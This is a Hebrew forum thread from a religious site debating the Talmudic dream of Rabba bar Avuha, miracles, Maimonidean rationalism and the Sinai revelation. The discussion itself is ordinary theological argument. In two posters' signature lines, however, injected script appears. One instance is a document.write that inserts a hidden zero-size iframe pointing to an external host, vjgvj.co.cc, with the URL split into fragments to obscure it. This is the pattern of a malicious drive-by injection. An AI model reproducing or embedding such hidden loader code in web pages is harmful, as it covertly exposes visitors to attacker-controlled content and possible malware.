בית פורומים עצור כאן חושבים

חלומו של רבה בר אבוה

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-19/1/2017 11:59 לינק ישיר 

מיימוני,

פירשת פירוש יפה. שים לב שאפשר להכליל את האגדה לדרכי התלמוד הבבלי הסובר שאין עניות ואין עושר אלא בתורה ובמעשים טובים. כלומר, להבדיל מדרכו של יעקב אבינו, שהיה שלם בגופו ובממונו ובתורתו; בבבל, ארץ נכרים, נעשה ניגוד בין גשמיות לרוחניות, ועל-כן לא למדו בשלמות ובעיון את סדר זרעים וסדר טהרות, מצוות התלויות בא"י העוסקות בתיקון הגוף (טהרות) ותיקון הכלכלה (זרעים).

תוקן על ידי מם80 ב- 19/01/2017 12:04:25

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 13:34 לינק ישיר 

יש

תודה. מסכים.

שלישישי

אמנם כתבת לנמדשיר אבל בעוד את הציטוט שציטטת ממנו (אין סתירה בין אמונה ברוחניות לבין גישה רציונלית) אני עוד יכול להבין, לא הבנתי מה הפסוק בא לומר. לא מה הפסוק המקורי אומר, ולא איזה שימוש אתה עושה בו.

אולי תרצה לפרט יותר. צריך לכתוב לא רק לגאונים.

בעל בעמיו

הצעתי שנדון באמונת המזיקים וברקע שלה באשכול אחר. אני מסכים להערתו הנפלאה של שאול ליברמן מורנו, שהמתבקש רציונלית הוא להאמין במזיקים אם יש עדויות רבות כל כך לקיומם. וכבר העיר, נדמה לי רביצקי, שפלא הוא כיצד הרמב"ם דחה את האמונות האלו בלי בסיס ברור (אני סבור שהרמב"ם צדק).

אמנם אני חוזר על מה שכתבתי: יתכן לקבל את האמונה במזיקים כי מי יכול לחלוק על נתונים אמפיריים (לכאורה) ועדיין לסבור שאירוע כמו של רב בר אבוה הוא חויה פנימית, נפשית.

הערת הערה חשובה מאד לדעתי:

מה מועילה העברה לחלום?

היא מועילה בכך שהמספר (ובעל החויה) והשומעים, לפחות החכמים, שאין כאן מציאות שאפשר לפגוש בה. שאני יכול לקוות לחלום תשובות לשאלותי, או לקבל אותן באירוע נפשי כלשהו, פנימי וחוויתי, אבל אין לי מה לצפות לקבל תשובה במפגש עם יש חיצוני.

אעיר עוד: כאן טענתי שמפגש בעל משמעות "רוחנית" (אני מאד נזהר במילה זו) יכול להיות פנימי ונפשי. יכול להיות גם מפגש חיצוני שאין לו ערך רוחני אלא הוא תוצר פסיכולוגי שנתפס לא נכון בידי הסביבה. דוגמא לדבר הוא "התגלות" קול המשנה מגרונו של בעל הבית יוסף בליל שבועות, אירוע שקרה בפני חבריו לשולחן שהתרשמו ממנו עמוקות. אני כמובן תופס כאן את הצד של ורבלובסקי, שכתב מחקר בנושא, ורואה בכך תופעה מהסוג של "דיבור אוטומטי" שאינה מופעלת בידי גורם חיצוני אלא על ידי האדם עצמו.

מה אני מרויח? כתבתי לעיל: האירוע מעיד על החווה ועל האנשים שמחשיבים את דרכו. אני מעתיק מעצמי לעיל:

אפשר אפילו לטעון שמי שפוגש את הדמות מן העולם ההוא אינו פוגש אלא את דמיונו וציפיותיו ממה שיקרה במפגש כזה. קריאה כזו אינה מורידה מערכו של בעל החויה ואינה הופכת אותו לאדם שוגה בדמיונות. קריאה כזו מעידה על מה שמעסיק את עולמו הפנימי: מצוות, אמונה, התמודדות.

לגבי השאלה על חלום כאירוע שמוזן בסיבתיות מנטלית או ביולוגית, זו שאלה מרתקת מאד ואין לי ידע בתחום. גם אין לי זמן להרצאה ואני מעדיף דברים בכתב, אם יש לינק.

אעיר רק שמבחינה פילוסופית אין סתירה בין שתי הקביעות: אירוע מסויים התרחש בגלל שהיו לו סיבות פיזיקליות, היסטוריות ועוד לבין הקביעה הנוספת: ה' ארגן כך שהאירוע הזה נולד מתוך סיבותיו.

אחד הניסים ה"קלאסיים", ייבוש וחלוקת ים סוף לשנים - מתואר בפסוקים כתוצאה של הליך כמו טבעי, בידי הרוח.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 14:15 לינק ישיר 

מיימוני
אלך עד הקצה.
אם מעמד הר סיני היה מעמד של סוגסטיה המונית, האם הוא מעיד רק על רצונם של ישראל לקבל תורה (כלשהי)?

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 14:24 לינק ישיר 

מיימוני כתב:

שלישישי

אמנם כתבת לנמדשיר אבל בעוד את הציטוט שציטטת ממנו (אין סתירה בין אמונה ברוחניות לבין גישה רציונלית) אני עוד יכול להבין, לא הבנתי מה הפסוק בא לומר. לא מה הפסוק המקורי אומר, ולא איזה שימוש אתה עושה בו.

אולי תרצה לפרט יותר. צריך לכתוב לא רק לגאונים.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

מיימוני
כוונתי הייתה לומר שאם נמדשיר מקבל שאין סתירה בין אמונה רוחנית לגישה 
רציונלית.
אז עליו לקבל את הפסוק שהבאתי כפשוטו ממש.

אֲנִי-אָמַרְתִּי, אֱלֹהִים אַתֶּם;    וּבְנֵי עֶלְיוֹן כֻּלְּכֶם.

נ.ב.
אם אין לכם זמן לשמוע הרצאה, אפשר ללכת לישון שעה מאוחר יותר, או לקום
שעה מוקדם יותר, או גם וגם.

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 15:33 לינק ישיר 

שלישישי

תודה על ההבהרה. אבל עדיין הדברים צריכים עיון. נמדשיר לא טען שצריך לקבל דברים "כפשוטם", לפחות לא במשפט שציטטת.

ובכלל, צריך לבדוק את הפסוק בהקשרו.

עד כמה שאני זוכר, המשורר פונה לקהל מסויים כדי לבקרו. אני, הוא אומר, כבר חשבתי שאתם חשובים, בני מעלה, אבל בסוף מתברר שלא, ממש לא. (בלשוננו היום).

מה הם התארים שהוא מעניק לאותם חשובים? "אלוהים אתם, בני עליון". המונח "אלוהים" עשוי להתייחס לקב"ה או לבשר ודם בעלי מעמד, בדרך כלל דיינים, לפי פירוש חז"ל וכנראה פשוטו של מקרא. בעוד ש"עליון" עשוי להיות כינוי לא-לוהים. ראשית, זה התואר של האלוקים שאותו עובד מלכיצדק מלך שלם, שהוא כהן שלו. שנית, השם הזה מוכר כשמו של אחד האלילים, להבדיל, בפנתאון מקומי (איני זוכר אם כנעני או אחר).

השאלה היא אם השימושים הלשוניים האלו הם מטאפוריים או שיש מאחוריהם איזו אמונה במציאות של "בני עליון" כלומר אלילי משנה. יש מי שטען כך, וזה מוביל למחלוקת של גישות בפרשנות המקרא. ברשותך נותיר זאת לאשכול אחר.

אני כן מוכן לעסוק בשאלה האם ומדוע נמדשיר ההיפותטי (שאני מדבר בשמו עד שיבוא) יהיה חייב, לוגית, לאמץ פירוש מסויים, אונטולוגי, לישים הנזכרים בפסוק שציטטת. אני סבור שזה לא טיעון תקף. כלומר, אין הכרח לוגי שיסבור כך. לא על פי העמדה שציטטת.

(תראה כמה מילים צריך לכתוב כדי להסביר דבר פשוט).

לגבי העצה לעשות זמן על חשבון שינה, זה רעיון מצויין, אילו היה נשאר לי זמן שאפשר לגנוב מזמן השינה.

כבר אמר החכם שקנית ספרים (או שאילתם) אינה מביאה איתה את הזמן הדרוש לעיון. בדומה לכך אפשר לומר היום שציון לינק אינו מספק את הזמן הדרוש לצפות בו. לכן אני מעדיף קריאה על פני צפיה. הקריאה הרבה יותר מהירה.

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 15:39 לינק ישיר 

בעל בעמיו

סליחה, רק כעת כשכתבתי ראיתי את שאלתך החדה והתמציתית.

שאלת:

אם מעמד הר סיני היה מעמד של סוגסטיה המונית, האם הוא מעיד רק על רצונם של ישראל לקבל תורה (כלשהי)?

לצערי לא הבנתי מספיק טוב את המונח "סוגסטיה המונית". ארשה לעצמי להניח שאתה מתכוון שזו היתה חויה ולא מציאות. משהו כמו חלום משותף של כל הנוכחים. חלום שאורגן עבורם על ידי, נניח, משה. איך הוא הצליח לעשות זאת שלא בדרך נס זו שאלה לא קלה.

בכל אופן, אם אתה שואל לגבי רצונו של העם באותו זמן נתון לקבל תורה, השאלה אינה מובילה לדעתי לתשובה חד משמעית או פשוטה.

לפי הסיפור שם, עם ישראל ידעו שהם עומדים לקבל תורה. אבל מה הבינו במונח הזה? מה היה היקף התורה שציפו לה? האם באמת רצו להתחייב? הסביר ביותר הוא שאם נעסוק בכללות העם אזי אפשר להניח שהם רצו ולא רצו. רצו תורה כי זו ברית עם אלוקים ואפילו בתפיסה הפשטנית ביותר, ודווקא בתפיסה כזו, עדיף להיות במצב ברית עם מישהו חזק כל כך כמו אלוקים. לא רצו כי מי רוצה להיות משועבד?

ואכן אמרו חז"ל במדרש שה' היה צריך לכפות עליהם "הר כגיגית", כלומר לאיים עליהם שיהפוך עליהם את ההר ויחניק אותם כדי שייאלצו להסכים. יתכן שזה אומר משהו על הפסיכולוגיה האנושית. אדם אינו אוהב להיות כפוף לאחרים. ואולי, אני מעז להציע, זה נובע מצלם אלוקים שבנו. כיון שאני צלם אלוקים, אני רוצה להיות בן חורין, גם מכפיפות להטרונומיה (כפיה) של חוק ואפילו משפט אלוקי. ואולי זה יצר הרע?

כל אלו תיאוריות שהעליתי כאן. הן אינן קשורות לפשט הפסוקים שם.

ואם אחזור לשאלתך לאחר שהארכתי, יש הבדל בין חויה נפשית שאדם מביא על עצמו לבין כזו שזולתו מזמן אותה עבורו.

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 16:13 לינק ישיר 

מיימוני
גם הרמב"ם שכתב שהוא נוטה למעט את הנסים, לא ברור לי מה הוא הרוויח.
ברגע שאני מודה באופציה של נס אחד, המונח טבע נצחי ובר קיימא איבד את משמעותו, ומה לי יציאת מצרים, מה לי כימי צאתך מארץ מצרים אראנו נפלאות, ומה לי נס של באבא היום.
השאלה היא כמותית ולא איכותית.

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 16:17 לינק ישיר 

ובשורה תחתונה, מה נשאר לחתניו? או שנחזור לשאלות של הרמב"ן על הרמב"ם בתחילת פרשת וירא.

והנה לפי דעתו זאת יצטרך לומר כן בענין לוט כי לא באו המלאכים אל ביתו ולא אפה להם מצות ויאכלו אבל הכל היה מראה ואם יעלה את לוט למעלת מראה הנבואה איך יהיו אנשי סדום הרעים והחטאים נביאים כי מי הגיד להם שבאו אנשים אל ביתו ואם הכל מראות נבואתו של לוט יהיה "ויאיצו המלאכים וגו' קום קח את אשתך" "ויאמר המלט על נפשך" (להלן יט, טו-יז) ו"הנה נשאתי פניך" (שם, כא) וכל הפרשה כלה מראה וישאר לוט בסדום אבל יחשוב שהיו המעשים נעשים מאליהם והמאמרים בכל דבר ודבר מראה ואלה דברים סותרים הכתוב אסור לשומעם אף כי להאמין בהם

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 18:49 לינק ישיר 

האם הרציונליסטים הקיצוניים ביותר יכולים להיות מתוארים כדתיים (כמעט בכל הגדרה שפויה של דת) אם אינם מאמינים באיזושהי אינטרקציה בין האלוקים לעולם (קרי - נס)?  

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 20:56 לינק ישיר 

ואחזור לחלום
גם אם הנס הוא תופעה רוחנית שבלום, עדיין קושיה במקומה עומדת. אם נניח שהקב"ה אינו משנה את הטבע כי חכמתו היא נצחית ואינו בר שינוי, אזי גם התערבות בחלומות של בני אדם, משנה ויוצרת דבר שלא היה צריך לקרות, ושוב חזרנו לסתירה בין חכמתו שמתבטאת בחוקים הקבועים לבין התופעה יוצאת הדופן.

דדווח על תוכן פוגעני

נשלח ב-19/1/2017 22:17 לינק ישיר 

מיימוני אני מתכוון שהדבר כפשוטו. שלישישי הפסוק שהבאת זה כפשוטו אני אמרתי... בורא עולם אמר לאחר מתן תורה אלוקים אתם ובני עליון... הכוונה שבני ישראל לאחר מתן תורה היו כמלאכים, שנקראים בני אלוקים. אבל לאחר חטא העגל חזרו למצב שלפני מתן תורה. ועל זה כביכול בורא עולם מתלונן

תוקן על ידי נמדשיר ב- 19/01/2017 23:00:37

דדווח על תוכן פוגעני

נשלח ב-20/1/2017 00:46 לינק ישיר 

תיקון מלאכים נקראים אלוקים. וכך בני ישראל היו לאחר מתן תורה.

דדווח על תוכן פוגעני

נשלח ב-20/1/2017 07:52 לינק ישיר 

בעל
כיהודה ועוד לקרא - אני מניח שאין הרבה הסבורים כי ה הוא כאבן שאין לה הופכין (כפי שאתה מבין בדעת הרמב"ם).  ההסתייגות מניסים היום אינה בגלל זה אלא בגלל נסיון החיים. ועל זה הערתי שאין לך דת שאינה תלויה בנס (התגלות) , לפחות תחילי. היהדות תלויה גם ביותר מנס ראשוני כי כל פרשנות שתקבל את מעמה"ס  בכל צורה שהיא ואת בסיס התורה תצטרך להסביר את העובדה כי אנשים האמינו לאחר מעמה"ס בניסי יציאת מצרים שאירעו להם. 

דדווח על תוכן פוגעני

נשלח ב-20/1/2017 10:49 לינק ישיר 

ת"ט
ספקנות בריאה היא דבר חיובי, ומי ייתן היום כל ה' ליטווקעס של פעם.
טיעוני הוא שאין סיבה עקרונית להניח שפעם היו נסים והיום לא.

דדווח על תוכן פוגעני

נשלח ב-22/1/2017 07:22 לינק ישיר 

אלא אם יש ראיות עקיפות להתגלות

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > חלומו של רבה בר אבוה
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 לדף הבא סך הכל 3 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.